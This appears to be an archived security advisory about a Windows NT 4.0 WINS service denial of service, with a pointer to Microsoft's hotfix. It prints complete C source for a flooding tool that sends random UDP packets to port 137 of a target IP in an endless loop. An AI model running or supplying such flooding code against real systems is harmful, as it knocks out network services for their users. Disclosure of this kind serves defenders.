COMMAND

    WINS

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    Ondxej Holas found  following.  When  a flood of  random (size and
    contents) UDP packets is sent  to port 137/UDP to machine  running
    WINS Server, this  service stops after  about 5 seconds.  This was
    reproduced on several  machines running NTS  4.0 + WINS.   Even if
    there were SP3 and all (12) recent postfixes, this service  stops.
    The stop is regular,  without Access Violation, manual  restart is
    possible (probably, when attacked, WINS service reports its  state
    to SCM). It  was never tested  on NT 3.5x.   Exploit code  follows
    (in  C).   If  you  can  stop  sending  random  137/UDP packets to
    specified address, simply press  Ctrl-C. The source is  written to
    fit  the  Windows   Sockets/Win32  API,  but   with  a  very   few
    modifications  can  be  compiled  on  UNIX  or  VMS machines (uses
    standard socket routines - socket(), bind(), send()...).

    #include <windows.h>
    #include <stdio.h>
    #include <winsock.h>

    char buffer [512];

    int main ( int argc, char **argv )
    {
	    WSADATA WSAData;
	    SOCKET s;
	    SOCKADDR_IN local, remote;
	    int rlen, datalen, i;

	    if ( argc != 2 )
	    {
		    printf ( "Usage: WINSKILL <host-IP>\n" );
		    return 0;
	    }

	    WSAStartup ( MAKEWORD ( 1, 1 ), &WSAData );

	    s = socket ( AF_INET, SOCK_DGRAM, 0 );
	    if ( s == INVALID_SOCKET )
	    {
		    printf ( "socket() failed.\n" );
		    goto quit;
	    }

	    local.sin_family = AF_INET;
	    local.sin_port = htons ( 0 );
	    local.sin_addr.s_addr = INADDR_ANY;

	    if ( bind ( s, (struct sockaddr far*) &local, sizeof ( local ) ) == SOCKET_ERROR )
	    {
		    printf ( "bind() failed.\n" );
		    goto quit;
	    }

	    remote.sin_family = AF_INET;
	    remote.sin_port = htons ( 137 );
	    if ( ( remote.sin_addr.s_addr = inet_addr ( argv [1] ) ) == INADDR_NONE )
	    {
		    printf ( "Invalid format of IP address.\n" );
		    goto quit;
	    }

	    while ( 1 )
	    {
		    rlen = sizeof ( remote );

		    datalen = rand ( ) % 512;
		    for ( i = 0; i < datalen; i++ )
			    buffer [i] = rand ( ) % 256;
		    sendto ( s, buffer, datalen, 0, (struct sockaddr far*) &remote, rlen );
		    Sleep ( 10 );
	    }

    quit:
	    WSACleanup ( );

	    return 0;
    }

SOLUTION

    Microsoft  have  released  a  hot  fix  which fixes the issue with
    flooding a WINS server by sending  UDP 13 packets to it.   The hot
    fix is available at:

        ftp.microsoft.com

    following path

        /bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/winsupd-fix